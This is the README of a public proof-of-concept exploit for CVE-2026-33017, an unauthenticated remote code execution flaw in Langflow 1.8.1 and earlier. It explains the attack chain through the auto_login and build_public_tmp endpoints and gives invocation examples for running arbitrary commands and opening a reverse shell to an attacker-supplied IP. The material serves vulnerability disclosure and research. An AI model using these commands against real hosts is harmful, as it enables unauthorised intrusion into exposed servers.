Share
## https://sploitus.com/exploit?id=7E546C23-E21F-556B-8183-8AD2AFD37BAC
# CVE-2026-33017-Langflow-RCE-PoC
The vulnerability in Langflow 1.8.1 and earlier allows a remote, unauthenticated attacker to achieve arbitrary command execution on the host.
## Description

The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint permits anyone to build public flows without authentication.

By supplying the optional data parameter, an attacker can override the stored flow with their own crafted definition, embedding arbitrary Python code within node configurations. This user-controlled code is executed via exec() with no sandboxing or validation, leading to unauthenticated remote code execution.
## Affected Versions
    Langflow 1.8.1 and earlier
    
## Features
- Creating a public flow if `AUTO_LOGIN=true`
- Exploit Execution: Execute arbitrary commands.
- Reverse Shell: Initiate a bash-based reverse shell.

## Prerequisites

- The target Langflow instance has at least one public flow (common in demos, chatbots, or shared workflows)
- One public flowโ€™s UUID (can be obtained from shared links/URLs)
- No authentication is required 

When `AUTO_LOGIN=true` (default configuration), an unauthenticated attacker can satisfy all conditions:

- `GET /api/v1/auto_login` โ†’ obtain a superuser token
- `POST /api/v1/flows/` โ†’ create a public flow
- Trigger the exploit via `build_public_tmp` without any authentication


## Usage

    python cve-2026-33017.py  [options]

Options:

    -p PORT, --port PORT: SSH port (default: 7860)

    -id FLOW_ID, --flow_id FLOW_ID: Public Flow ID (a new one will be created if omitted)

    -c COMMAND, --command COMMAND: Custom command to execute
    
    --shell: Launch a reverse shell
    
    --lhost LHOST: Attacker's IP for reverse shell
    
    --lport LPORT: Attacker's port for reverse shell (default: 4444)

    -t TIMEOUT, --timeout TIMEOUT: Connection timeout in seconds (default: 5)


## Examples:

### Execute a command:
    python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'

### Initiate a reverse shell:
    python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

## References
  
  [GitHub Advisory](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx)
  
  [NVD CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017)
  
  [Medium](https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896)

## โš ๏ธ Disclaimer
This PoC is for **educational and research purposes only**. Use it at your own risk. The author is not responsible for any misuse or damage caused.